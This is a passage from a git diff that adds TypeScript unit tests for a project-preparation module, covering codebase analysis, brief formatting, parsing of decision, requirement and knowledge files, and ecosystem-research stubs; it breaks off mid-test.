+  test("when DB is unavailable, all milestones with CONTEXT-DRAFT produce warnings (safe fallback)", () => {
+    closeDatabase();
+    assert.ok(!isDbAvailable(), "DB should be unavailable after close");
+
+    const milestoneIds = ["M001", "M002", "M003"];
+    const issues: string[] = [];
+
+    for (const id of milestoneIds) {
+      if (isDbAvailable()) {
+        const ms = getMilestone(id);
+        if (ms?.status === "complete" || ms?.status === "parked") continue;
+      }
+      const draft = resolveMilestoneFile(tmpBase, id, "CONTEXT-DRAFT");
+      if (draft) {
+        issues.push(`${id}: has CONTEXT-DRAFT.md (will pause for discussion)`);
+      }
+    }
+
+    assert.equal(issues.length, 3, "all milestones should warn when DB is unavailable");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/preparation.test.ts b/src/resources/extensions/gsd/tests/preparation.test.ts
new file mode 100644
index 000000000..569efed10
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/preparation.test.ts
@@ -0,0 +1,1211 @@
+/**
+ * Unit tests for GSD Preparation — codebase analysis and brief generation.
+ *
+ * Exercises the pure preparation functions:
+ * - analyzeCodebase() with various project layouts
+ * - formatCodebaseBrief() output format and truncation
+ * - Pattern extraction from sampled files
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, writeFileSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import {
+  analyzeCodebase,
+  formatCodebaseBrief,
+  aggregatePriorContext,
+  formatPriorContextBrief,
+  researchEcosystem,
+  formatEcosystemBrief,
+  runPreparation,
+  type CodebaseBrief,
+  type PriorContextBrief,
+  type EcosystemBrief,
+  type EcosystemFinding,
+  type PreparationUIContext,
+  type PreparationPreferences,
+  type PreparationResult,
+} from "../preparation.ts";
+import { PROJECT_FILES } from "../detection.ts";
+
+// ─── Test Helpers ───────────────────────────────────────────────────────────────
+
+function makeTempDir(prefix: string): string {
+  const dir = join(
+    tmpdir(),
+    `gsd-preparation-test-${prefix}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+  );
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+function cleanup(dir: string): void {
+  try {
+    rmSync(dir, { recursive: true, force: true });
+  } catch {
+    // best-effort
+  }
+}
+
+// ─── analyzeCodebase ────────────────────────────────────────────────────────────
+
+test("analyzeCodebase: empty directory returns valid brief structure", async (t) => {
+  const dir = makeTempDir("empty");
+  t.after(() => cleanup(dir));
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.ok(brief, "should return a brief");
+  assert.ok(brief.techStack, "should have techStack");
+  assert.ok(brief.moduleStructure, "should have moduleStructure");
+  assert.ok(brief.patterns, "should have patterns");
+  assert.ok(Array.isArray(brief.sampledFiles), "should have sampledFiles array");
+  assert.equal(brief.sampledFiles.length, 0, "empty dir should have no sampled files");
+});
+
+test("analyzeCodebase: detects package.json in PROJECT_FILES", async (t) => {
+  const dir = makeTempDir("pkg-json");
+  t.after(() => cleanup(dir));
+
+  writeFileSync(
+    join(dir, "package.json"),
+    JSON.stringify({ name: "test-project", scripts: { test: "jest" } }),
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.ok(
+    brief.techStack.detectedFiles.includes("package.json"),
+    "should detect package.json",
+  );
+  assert.equal(brief.techStack.primaryLanguage, "javascript/typescript");
+});
+
+test("analyzeCodebase: detects module structure from src/ directory", async (t) => {
+  const dir = makeTempDir("module-struct");
+  t.after(() => cleanup(dir));
+
+  // Create src directory with subdirs
+  mkdirSync(join(dir, "src", "components"), { recursive: true });
+  mkdirSync(join(dir, "src", "utils"), { recursive: true });
+  mkdirSync(join(dir, "src", "hooks"), { recursive: true });
+  mkdirSync(join(dir, "test"), { recursive: true });
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.ok(
+    brief.moduleStructure.topLevelDirs.includes("src"),
+    "should detect src as top-level dir",
+  );
+  assert.ok(
+    brief.moduleStructure.topLevelDirs.includes("test"),
+    "should detect test as top-level dir",
+  );
+  assert.ok(
+    brief.moduleStructure.srcSubdirs.includes("components"),
+    "should detect components subdir",
+  );
+  assert.ok(
+    brief.moduleStructure.srcSubdirs.includes("utils"),
+    "should detect utils subdir",
+  );
+  assert.ok(
+    brief.moduleStructure.srcSubdirs.includes("hooks"),
+    "should detect hooks subdir",
+  );
+});
+
+test("analyzeCodebase: samples TypeScript files from src/", async (t) => {
+  const dir = makeTempDir("sample-ts");
+  t.after(() => cleanup(dir));
+
+  // Create src directory with TypeScript files
+  mkdirSync(join(dir, "src"), { recursive: true });
+  writeFileSync(
+    join(dir, "src", "index.ts"),
+    `export async function main() { await fetch('/api'); }`,
+    "utf-8",
+  );
+  writeFileSync(
+    join(dir, "src", "utils.ts"),
+    `export function helper() { try { return 1; } catch (e) { throw e; } }`,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.ok(brief.sampledFiles.length > 0, "should sample at least one file");
+  assert.ok(
+    brief.sampledFiles.some((f) => f.startsWith("src/")),
+    "should prefer src/ files",
+  );
+});
+
+test("analyzeCodebase: excludes test files from sampling", async (t) => {
+  const dir = makeTempDir("exclude-tests");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, "src"), { recursive: true });
+  writeFileSync(join(dir, "src", "index.ts"), `export const x = 1;`, "utf-8");
+  writeFileSync(
+    join(dir, "src", "index.test.ts"),
+    `import test from 'node:test'; test('x', () => {});`,
+    "utf-8",
+  );
+  writeFileSync(
+    join(dir, "src", "utils.spec.ts"),
+    `describe('utils', () => { it('works', () => {}); });`,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  // Should only have index.ts, not test/spec files
+  for (const file of brief.sampledFiles) {
+    assert.ok(!file.endsWith(".test.ts"), `should not sample ${file}`);
+    assert.ok(!file.endsWith(".spec.ts"), `should not sample ${file}`);
+  }
+});
+
+test("analyzeCodebase: excludes node_modules from sampling", async (t) => {
+  const dir = makeTempDir("exclude-nm");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, "src"), { recursive: true });
+  mkdirSync(join(dir, "node_modules", "some-pkg"), { recursive: true });
+  writeFileSync(join(dir, "src", "index.ts"), `export const x = 1;`, "utf-8");
+  writeFileSync(
+    join(dir, "node_modules", "some-pkg", "index.js"),
+    `module.exports = {};`,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  for (const file of brief.sampledFiles) {
+    assert.ok(!file.includes("node_modules"), `should not sample ${file}`);
+  }
+});
+
+test("analyzeCodebase: extracts async/await pattern", async (t) => {
+  const dir = makeTempDir("async-await");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, "src"), { recursive: true });
+  writeFileSync(
+    join(dir, "src", "api.ts"),
+    `
+export async function fetchData() {
+  const res = await fetch('/api');
+  const data = await res.json();
+  return data;
+}
+
+export async function saveData(data: any) {
+  await fetch('/api', { method: 'POST', body: JSON.stringify(data) });
+}
+    `,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.equal(
+    brief.patterns.asyncStyle,
+    "async/await",
+    "should detect async/await as primary style",
+  );
+});
+
+test("analyzeCodebase: extracts try/catch error handling", async (t) => {
+  const dir = makeTempDir("try-catch");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, "src"), { recursive: true });
+  writeFileSync(
+    join(dir, "src", "handler.ts"),
+    `
+export function handleError() {
+  try {
+    doSomething();
+  } catch (error) {
+    console.error(error);
+  }
+}
+
+export function anotherHandler() {
+  try {
+    doOther();
+  } catch (e) {
+    throw new Error('wrapped');
+  }
+}
+    `,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.equal(
+    brief.patterns.errorHandling,
+    "try/catch",
+    "should detect try/catch as primary error handling",
+  );
+});
+
+test("analyzeCodebase: extracts camelCase naming convention", async (t) => {
+  const dir = makeTempDir("camel-case");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, "src"), { recursive: true });
+  writeFileSync(
+    join(dir, "src", "utils.ts"),
+    `
+export function getUserById(userId: string) {
+  return fetchUser(userId);
+}
+
+export function calculateTotalPrice(itemPrices: number[]) {
+  return itemPrices.reduce((a, b) => a + b, 0);
+}
+
+export function formatDisplayName(firstName: string, lastName: string) {
+  return \`\${firstName} \${lastName}\`;
+}
+    `,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  // camelCase should be detected (getUserById, userId, fetchUser, etc.)
+  assert.ok(
+    brief.patterns.namingConvention === "camelCase" || brief.patterns.namingConvention === "mixed",
+    `should detect camelCase or mixed, got ${brief.patterns.namingConvention}`,
+  );
+});
+
+test("analyzeCodebase: gracefully handles empty directories", async (t) => {
+  const dir = makeTempDir("empty-src");
+  t.after(() => cleanup(dir));
+
+  // Create empty src directory
+  mkdirSync(join(dir, "src"), { recursive: true });
+
+  const brief = await analyzeCodebase(dir);
+
+  // Should not throw, should return valid structure
+  assert.ok(brief.patterns, "should have patterns");
+  assert.equal(brief.patterns.asyncStyle, "unknown", "should return unknown for empty");
+  assert.equal(brief.patterns.errorHandling, "unknown", "should return unknown for empty");
+  assert.equal(brief.patterns.namingConvention, "unknown", "should return unknown for empty");
+});
+
+test("analyzeCodebase: returns unknown for unrecognized language patterns (Ruby)", async (t) => {
+  // Ruby is detected by LANGUAGE_MAP but not in LANGUAGE_PATTERNS registry
+  // This tests the graceful fallback behavior: naming convention still works,
+  // but language-specific patterns (async/error) should return "unknown"
+  const dir = makeTempDir("ruby-project");
+  t.after(() => cleanup(dir));
+
+  // Create a Ruby project with Gemfile (detected as "ruby" in LANGUAGE_MAP)
+  writeFileSync(join(dir, "Gemfile"), `source "https://rubygems.org"\ngem "rails"`, "utf-8");
+
+  // Add a Ruby file with patterns that would match JS/TS regexes incorrectly
+  mkdirSync(join(dir, "lib"), { recursive: true });
+  writeFileSync(
+    join(dir, "lib", "service.rb"),
+    `
+class UserService
+  def fetch_user(user_id)
+    user = User.find(user_id)
+    user
+  rescue ActiveRecord::RecordNotFound => e
+    Rails.logger.error("User not found: #{e.message}")
+    nil
+  end
+
+  def async_task(&block)
+    # Ruby doesn't have async/await but has yield and blocks
+    Thread.new { yield }
+  end
+end
+    `,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  // Language should be detected as Ruby
+  assert.equal(brief.techStack.primaryLanguage, "ruby", "should detect ruby from Gemfile");
+
+  // Language-specific patterns should return "unknown" (not JS/TS patterns)
+  assert.equal(
+    brief.patterns.asyncStyle,
+    "unknown",
+    "should return unknown for async style in unrecognized language",
+  );
+  assert.equal(
+    brief.patterns.errorHandling,
+    "unknown",
+    "should return unknown for error handling in unrecognized language",
+  );
+
+  // But naming convention detection should still work (it's universal)
+  // The Ruby code uses snake_case (fetch_user, user_id) and camelCase (UserService)
+  assert.ok(
+    brief.patterns.namingConvention !== "unknown",
+    "naming convention should still be detected for unrecognized languages",
+  );
+
+  // Evidence should explain why patterns aren't available
+  assert.ok(
+    brief.patterns.evidence.asyncStyle.some((e) => e.includes("not in pattern registry")),
+    "evidence should explain async style is not available",
+  );
+  assert.ok(
+    brief.patterns.evidence.errorHandling.some((e) => e.includes("not in pattern registry")),
+    "evidence should explain error handling is not available",
+  );
+});
+
+// ─── formatCodebaseBrief ────────────────────────────────────────────────────────
+
+test("formatCodebaseBrief: produces markdown output", async (t) => {
+  const brief: CodebaseBrief = {
+    techStack: {
+      primaryLanguage: "javascript/typescript",
+      detectedFiles: ["package.json", "tsconfig.json"],
+      packageManager: "npm",
+      isMonorepo: false,
+      hasTests: true,
+      hasCI: true,
+    },
+    moduleStructure: {
+      topLevelDirs: ["src", "test"],
+      srcSubdirs: ["components", "utils"],
+      totalFilesSampled: 5,
+    },
+    patterns: {
+      asyncStyle: "async/await",
+      errorHandling: "try/catch",
+      namingConvention: "camelCase",
+      evidence: {
+        asyncStyle: ["src/api.ts: async/await (5 occurrences)"],
+        errorHandling: ["src/handler.ts: try/catch (3 occurrences)"],
+        namingConvention: ["camelCase: 50 occurrences"],
+      },
+      fileCounts: {
+        asyncAwait: 3,
+        promises: 0,
+        callbacks: 0,
+        tryCatch: 2,
+        errorCallbacks: 0,
+        resultTypes: 0,
+      },
+    },
+    sampledFiles: ["src/index.ts", "src/utils.ts"],
+  };
+
+  const formatted = formatCodebaseBrief(brief);
+
+  assert.ok(formatted.includes("## Tech Stack"), "should have Tech Stack section");
+  assert.ok(formatted.includes("## Module Structure"), "should have Module Structure section");
+  assert.ok(formatted.includes("## Code Patterns"), "should have Code Patterns section");
+  assert.ok(formatted.includes("javascript/typescript"), "should include language");
+  assert.ok(formatted.includes("npm"), "should include package manager");
+  assert.ok(formatted.includes("async/await"), "should include async style");
+  assert.ok(formatted.includes("try/catch"), "should include error handling");
+  assert.ok(formatted.includes("camelCase"), "should include naming convention");
+  assert.ok(formatted.includes("3 async/await files"), "should include file counts for async style");
+  assert.ok(formatted.includes("2 try/catch files"), "should include file counts for error handling");
+});
+
+test("formatCodebaseBrief: caps output at 3000 chars", async (t) => {
+  // Create a brief with many files to exceed the limit
+  const manyFiles = Array.from({ length: 100 }, (_, i) => `file-${i}.ts`);
+
+  const brief: CodebaseBrief = {
+    techStack: {
+      primaryLanguage: "javascript/typescript",
+      detectedFiles: manyFiles,
+      packageManager: "npm",
+      isMonorepo: false,
+      hasTests: true,
+      hasCI: true,
+    },
+    moduleStructure: {
+      topLevelDirs: Array.from({ length: 50 }, (_, i) => `dir-${i}`),
+      srcSubdirs: Array.from({ length: 50 }, (_, i) => `subdir-${i}`),
+      totalFilesSampled: 100,
+    },
+    patterns: {
+      asyncStyle: "async/await",
+      errorHandling: "try/catch",
+      namingConvention: "camelCase",
+      evidence: {
+        asyncStyle: manyFiles.map((f) => `${f}: async/await (10 occurrences)`),
+        errorHandling: manyFiles.map((f) => `${f}: try/catch (5 occurrences)`),
+        namingConvention: ["camelCase: 500 occurrences"],
+      },
+      fileCounts: {
+        asyncAwait: 50,
+        promises: 10,
+        callbacks: 5,
+        tryCatch: 30,
+        errorCallbacks: 5,
+        resultTypes: 0,
+      },
+    },
+    sampledFiles: manyFiles,
+  };
+
+  const formatted = formatCodebaseBrief(brief);
+
+  assert.ok(
+    formatted.length <= 3000,
+    `should cap at 3000 chars, got ${formatted.length}`,
+  );
+  if (formatted.length === 3000) {
+    assert.ok(formatted.endsWith("..."), "should end with ellipsis when truncated");
+  }
+});
+
+test("formatCodebaseBrief: handles minimal brief", async (t) => {
+  const brief: CodebaseBrief = {
+    techStack: {
+      primaryLanguage: undefined,
+      detectedFiles: [],
+      packageManager: undefined,
+      isMonorepo: false,
+      hasTests: false,
+      hasCI: false,
+    },
+    moduleStructure: {
+      topLevelDirs: [],
+      srcSubdirs: [],
+      totalFilesSampled: 0,
+    },
+    patterns: {
+      asyncStyle: "unknown",
+      errorHandling: "unknown",
+      namingConvention: "unknown",
+      evidence: {
+        asyncStyle: [],
+        errorHandling: [],
+        namingConvention: [],
+      },
+      fileCounts: {
+        asyncAwait: 0,
+        promises: 0,
+        callbacks: 0,
+        tryCatch: 0,
+        errorCallbacks: 0,
+        resultTypes: 0,
+      },
+    },
+    sampledFiles: [],
+  };
+
+  const formatted = formatCodebaseBrief(brief);
+
+  assert.ok(formatted.includes("## Tech Stack"), "should still have sections");
+  assert.ok(formatted.includes("**Monorepo:** No"), "should show monorepo status");
+  assert.ok(formatted.includes("unknown"), "should show unknown patterns");
+});
+
+// ─── Integration: Brief includes PROJECT_FILES markers ──────────────────────────
+
+test("analyzeCodebase: brief includes detected files from PROJECT_FILES", async (t) => {
+  const dir = makeTempDir("project-files");
+  t.after(() => cleanup(dir));
+
+  // Create several PROJECT_FILES markers
+  writeFileSync(join(dir, "package.json"), '{"name": "test"}', "utf-8");
+  writeFileSync(join(dir, "tsconfig.json"), '{}', "utf-8");
+  mkdirSync(join(dir, ".github", "workflows"), { recursive: true });
+  writeFileSync(
+    join(dir, ".github", "workflows", "ci.yml"),
+    "name: CI",
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.ok(
+    brief.techStack.detectedFiles.includes("package.json"),
+    "should detect package.json",
+  );
+  assert.ok(
+    brief.techStack.hasCI,
+    "should detect CI from .github/workflows",
+  );
+});
+
+test("analyzeCodebase: brief includes sampled file patterns", async (t) => {
+  const dir = makeTempDir("sampled-patterns");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, "src"), { recursive: true });
+
+  // Write files with distinct patterns
+  writeFileSync(
+    join(dir, "src", "async-heavy.ts"),
+    `
+async function one() { await fetch('/a'); }
+async function two() { await fetch('/b'); }
+async function three() { await fetch('/c'); }
+    `,
+    "utf-8",
+  );
+
+  const brief = await analyzeCodebase(dir);
+
+  assert.ok(brief.sampledFiles.length > 0, "should have sampled files");
+  assert.ok(
+    brief.patterns.evidence.asyncStyle.length > 0,
+    "should have async style evidence",
+  );
+});
+
+// ─── aggregatePriorContext ──────────────────────────────────────────────────────
+
+test("aggregatePriorContext: handles missing files gracefully", async (t) => {
+  const dir = makeTempDir("no-gsd");
+  t.after(() => cleanup(dir));
+
+  // Create .gsd directory but no files
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+
+  const brief = await aggregatePriorContext(dir);
+
+  assert.equal(brief.decisions.totalCount, 0, "should have no decisions");
+  assert.equal(brief.requirements.totalCount, 0, "should have no requirements");
+  assert.equal(brief.knowledge, "No prior knowledge recorded.", "should indicate no knowledge");
+  assert.equal(brief.summaries, "No prior milestone summaries.", "should indicate no summaries");
+});
+
+test("aggregatePriorContext: handles completely empty directory", async (t) => {
+  const dir = makeTempDir("empty-project");
+  t.after(() => cleanup(dir));
+
+  const brief = await aggregatePriorContext(dir);
+
+  assert.equal(brief.decisions.totalCount, 0);
+  assert.equal(brief.requirements.totalCount, 0);
+  assert.equal(brief.knowledge, "No prior knowledge recorded.");
+  assert.equal(brief.summaries, "No prior milestone summaries.");
+});
+
+test("aggregatePriorContext: parses DECISIONS.md and groups by scope", async (t) => {
+  const dir = makeTempDir("decisions");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(
+    join(dir, ".gsd", "DECISIONS.md"),
+    `# Decisions Register
+
+| # | When | Scope | Decision | Choice | Rationale | Revisable? | Made By |
+|---|------|-------|----------|--------|-----------|------------|---------|
+| D001 | M001/S01 | pattern | Async style | async/await | Modern standard | Yes | agent |
+| D002 | M001/S02 | architecture | Data layer | SQLite | Simple, embedded | No | human |
+| D003 | M001/S03 | pattern | Error handling | try/catch | Consistency | Yes | agent |
+`,
+    "utf-8",
+  );
+
+  const brief = await aggregatePriorContext(dir);
+
+  assert.equal(brief.decisions.totalCount, 3, "should parse all decisions");
+  assert.equal(brief.decisions.byScope.get("pattern")?.length, 2, "should group pattern scope");
+  assert.equal(brief.decisions.byScope.get("architecture")?.length, 1, "should group architecture scope");
+
+  const patternDecisions = brief.decisions.byScope.get("pattern")!;
+  assert.equal(patternDecisions[0].id, "D001");
+  assert.equal(patternDecisions[0].decision, "Async style");
+  assert.equal(patternDecisions[0].choice, "async/await");
+});
+
+test("aggregatePriorContext: parses REQUIREMENTS.md and groups by status", async (t) => {
+  const dir = makeTempDir("requirements");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(
+    join(dir, ".gsd", "REQUIREMENTS.md"),
+    `# Requirements
+
+## Active
+
+### R001 — First requirement
+- Status: active
+- Description: Something active
+
+### R002 — Second requirement
+- Status: active
+- Description: Also active
+
+## Validated
+
+### R003 — Validated requirement
+- Status: validated
+- Description: This was validated
+
+## Deferred
+
+### R004 — Deferred requirement
+- Status: deferred
+- Description: Postponed for later
+`,
+    "utf-8",
+  );
+
+  const brief = await aggregatePriorContext(dir);
+
+  assert.equal(brief.requirements.totalCount, 4, "should parse all requirements");
+  assert.equal(brief.requirements.active.length, 2, "should have 2 active");
+  assert.equal(brief.requirements.validated.length, 1, "should have 1 validated");
+  assert.equal(brief.requirements.deferred.length, 1, "should have 1 deferred");
+
+  assert.equal(brief.requirements.active[0].id, "R001");
+  assert.equal(brief.requirements.active[0].description, "First requirement");
+});
+
+test("aggregatePriorContext: loads KNOWLEDGE.md content", async (t) => {
+  const dir = makeTempDir("knowledge");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(
+    join(dir, ".gsd", "KNOWLEDGE.md"),
+    `# Knowledge Base
+
+## Rules
+
+| # | Scope | Rule | Why | Added |
+|---|-------|------|-----|-------|
+| K001 | global | Always use TypeScript | Type safety | manual |
+
+## Patterns
+
+**Pattern X:** Do this for better Y.
+`,
+    "utf-8",
+  );
+
+  const brief = await aggregatePriorContext(dir);
+
+  assert.ok(brief.knowledge.includes("Rules"), "should include knowledge content");
+  assert.ok(brief.knowledge.includes("TypeScript"), "should include rule text");
+});
+
+test("aggregatePriorContext: truncates oversized content without cutting mid-section", async (t) => {
+  const dir = makeTempDir("large-knowledge");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+
+  // Create large knowledge file
+  const largeContent = `# Knowledge Base
+
+## Section One
+
+${"Lorem ipsum dolor sit amet. ".repeat(100)}
+
+## Section Two
+
+${"More content here. ".repeat(100)}
+
+## Section Three
+
+${"Even more content. ".repeat(100)}
+`;
+
+  writeFileSync(join(dir, ".gsd", "KNOWLEDGE.md"), largeContent, "utf-8");
+
+  const brief = await aggregatePriorContext(dir);
+
+  assert.ok(brief.knowledge.length <= 2000, "should truncate to 2K chars");
+  assert.ok(brief.knowledge.includes("[truncated]"), "should indicate truncation");
+  // Should try to preserve section boundaries
+  assert.ok(
+    brief.knowledge.includes("## Section"),
+    "should keep section headings intact",
+  );
+});
+
+test("aggregatePriorContext: loads milestone summaries", async (t) => {
+  const dir = makeTempDir("milestones");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
+  mkdirSync(join(dir, ".gsd", "milestones", "M002"), { recursive: true });
+
+  writeFileSync(
+    join(dir, ".gsd", "milestones", "M001", "MILESTONE-SUMMARY.md"),
+    `# M001 — First Milestone
+
+**Implemented core functionality and established patterns.**
+
+## What Happened
+Did stuff.
+`,
+    "utf-8",
+  );
+
+  writeFileSync(
+    join(dir, ".gsd", "milestones", "M002", "MILESTONE-SUMMARY.md"),
+    `# M002 — Second Milestone
+
+**Extended the system with new features.**
+
+## What Happened
+Did more stuff.
+`,
+    "utf-8",
+  );
+
+  const brief = await aggregatePriorContext(dir);
+
+  assert.ok(brief.summaries.includes("M001"), "should include M001 summary");
+  assert.ok(brief.summaries.includes("M002"), "should include M002 summary");
+  assert.ok(
+    brief.summaries.includes("core functionality"),
+    "should extract one-liner from M001",
+  );
+  assert.ok(
+    brief.summaries.includes("new features"),
+    "should extract one-liner from M002",
+  );
+});
+
+// ─── formatPriorContextBrief ────────────────────────────────────────────────────
+
+test("formatPriorContextBrief: produces markdown with all sections", async (t) => {
+  const brief: PriorContextBrief = {
+    decisions: {
+      byScope: new Map([
+        [
+          "pattern",
+          [
+            { id: "D001", scope: "pattern", decision: "Async", choice: "await", rationale: "Modern" },
+          ],
+        ],
+        [
+          "architecture",
+          [
+            { id: "D002", scope: "architecture", decision: "DB", choice: "SQLite", rationale: "Simple" },
+          ],
+        ],
+      ]),
+      totalCount: 2,
+    },
+    requirements: {
+      active: [{ id: "R001", description: "Core feature", status: "active" }],
+      validated: [],
+      deferred: [],
+      totalCount: 1,
+    },
+    knowledge: "Some knowledge here.",
+    summaries: "### M001\nDid things.",
+  };
+
+  const formatted = formatPriorContextBrief(brief);
+
+  assert.ok(formatted.includes("## Prior Decisions"), "should have decisions section");
+  assert.ok(formatted.includes("## Prior Requirements"), "should have requirements section");
+  assert.ok(formatted.includes("## Prior Knowledge"), "should have knowledge section");
+  assert.ok(formatted.includes("## Prior Milestone Summaries"), "should have summaries section");
+  assert.ok(formatted.includes("D001"), "should include decision ID");
+  assert.ok(formatted.includes("R001"), "should include requirement ID");
+  assert.ok(formatted.includes("pattern"), "should include scope heading");
+});
+
+test("formatPriorContextBrief: handles empty brief", async (t) => {
+  const brief: PriorContextBrief = {
+    decisions: {
+      byScope: new Map(),
+      totalCount: 0,
+    },
+    requirements: {
+      active: [],
+      validated: [],
+      deferred: [],
+      totalCount: 0,
+    },
+    knowledge: "No prior knowledge recorded.",
+    summaries: "No prior milestone summaries.",
+  };
+
+  const formatted = formatPriorContextBrief(brief);
+
+  assert.ok(formatted.includes("No prior decisions recorded"), "should indicate no decisions");
+  assert.ok(formatted.includes("No prior requirements recorded"), "should indicate no requirements");
+  assert.ok(formatted.includes("No prior knowledge recorded"), "should indicate no knowledge");
+  assert.ok(formatted.includes("No prior milestone summaries"), "should indicate no summaries");
+});
+
+test("formatPriorContextBrief: caps total output at 6K chars", async (t) => {
+  // Create a brief with lots of content
+  const manyDecisions: Array<{
+    id: string;
+    scope: string;
+    decision: string;
+    choice: string;
+    rationale: string;
+  }> = [];
+  for (let i = 0; i < 100; i++) {
+    manyDecisions.push({
+      id: `D${String(i).padStart(3, "0")}`,
+      scope: "pattern",
+      decision: `Decision number ${i} with some extra text for length`,
+      choice: `Choice ${i} with more text to make it longer`,
+      rationale: `Rationale ${i}`,
+    });
+  }
+
+  const manyRequirements: Array<{
+    id: string;
+    description: string;
+    status: "active";
+  }> = [];
+  for (let i = 0; i < 100; i++) {
+    manyRequirements.push({
+      id: `R${String(i).padStart(3, "0")}`,
+      description: `Requirement ${i} with a long description that takes up space`,
+      status: "active",
+    });
+  }
+
+  const brief: PriorContextBrief = {
+    decisions: {
+      byScope: new Map([["pattern", manyDecisions]]),
+      totalCount: 100,
+    },
+    requirements: {
+      active: manyRequirements,
+      validated: [],
+      deferred: [],
+      totalCount: 100,
+    },
+    knowledge: "A ".repeat(1000),
+    summaries: "B ".repeat(1000),
+  };
+
+  const formatted = formatPriorContextBrief(brief);
+
+  assert.ok(formatted.length <= 6000, `should cap at 6000 chars, got ${formatted.length}`);
+});
+
+// ─── researchEcosystem ──────────────────────────────────────────────────────────
+// Note: Ecosystem research now always returns available: false from the preparation
+// phase. Research happens during the discussion using web search tools.
+
+test("researchEcosystem: always returns available: false (research happens during discussion)", async (t) => {
+  const dir = makeTempDir("ecosystem-disabled");
+  t.after(() => cleanup(dir));
+
+  const brief = await researchEcosystem(["Next.js", "TypeScript"], dir);
+
+  assert.equal(brief.available, false, "should indicate research not available from preparation");
+  assert.ok(brief.skippedReason, "should have skipped reason");
+  assert.ok(
+    brief.skippedReason!.includes("during the discussion"),
+    "should explain research happens during discussion",
+  );
+  assert.deepEqual(brief.queries, [], "should have empty queries");
+  assert.deepEqual(brief.findings, [], "should have empty findings");
+});
+
+test("researchEcosystem: returns consistent result regardless of tech stack", async (t) => {
+  const dir = makeTempDir("ecosystem-consistent");
+  t.after(() => cleanup(dir));
+
+  // With tech stack
+  const briefWithTech = await researchEcosystem(["React", "Next.js"], dir);
+  // Without tech stack
+  const briefEmpty = await researchEcosystem([], dir);
+
+  // Both should return the same unavailable result
+  assert.equal(briefWithTech.available, false);
+  assert.equal(briefEmpty.available, false);
+  assert.deepEqual(briefWithTech.queries, []);
+  assert.deepEqual(briefEmpty.queries, []);
+});
+
+// ─── formatEcosystemBrief ─��─────────────────────────────────────────────────────
+// Note: formatEcosystemBrief now returns a simple fixed message since ecosystem
+// research always returns unavailable from the preparation phase.
+
+test("formatEcosystemBrief: returns simplified message for discussion-phase research", async (t) => {
+  const brief: EcosystemBrief = {
+    available: false,
+    queries: [],
+    findings: [],
+    skippedReason: "Ecosystem research is performed during the discussion using web search tools, not during preparation.",
+  };
+
+  const formatted = formatEcosystemBrief(brief);
+
+  assert.ok(formatted.includes("## Ecosystem Research"), "should have section header");
+  assert.ok(formatted.includes("during the discussion"), "should mention discussion phase");
+  assert.ok(formatted.includes("web search tools"), "should mention web search tools");
+});
+
+test("formatEcosystemBrief: returns consistent output regardless of brief content", async (t) => {
+  // Even if a brief has findings (which shouldn't happen from preparation),
+  // the function returns the simplified message
+  const briefWithFindings: EcosystemBrief = {
+    available: true,
+    queries: ["test query"],
+    findings: [{ query: "test", title: "Test", snippet: "test", url: "https://example.com" }],
+    provider: "tavily",
+  };
+
+  const briefEmpty: EcosystemBrief = {
+    available: false,
+    queries: [],
+    findings: [],
+    skippedReason: "Test reason",
+  };
+
+  const formatted1 = formatEcosystemBrief(briefWithFindings);
+  const formatted2 = formatEcosystemBrief(briefEmpty);
+
+  // Both should return the same simplified message
+  assert.equal(formatted1, formatted2, "should return consistent output");
+  assert.ok(formatted1.includes("## Ecosystem Research"), "should have section header");
+});
+
+
+// ─── runPreparation (Orchestrator) ──────────────────────────────────────────────
+
+/**
+ * Mock UI context that captures notifications for testing.
+ */
+function createMockUI(): PreparationUIContext & { notifications: Array<{ message: string; type?: string }> } {
+  const notifications: Array<{ message: string; type?: string }> = [];
+  return {
+    notifications,
+    notify(message: string, type?: "info" | "warning" | "error" | "success") {
+      notifications.push({ message, type });
+    },
+  };
+}
+
+test("runPreparation: returns complete result with all briefs populated", async (t) => {
+  const dir = makeTempDir("runprep-full");
+  t.after(() => cleanup(dir));
+
+  // Set up a minimal project
+  mkdirSync(join(dir, "src"), { recursive: true });
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, "package.json"), '{"name": "test-project"}', "utf-8");
+  writeFileSync(join(dir, "src", "index.ts"), 'export const x = 1;', "utf-8");
+
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
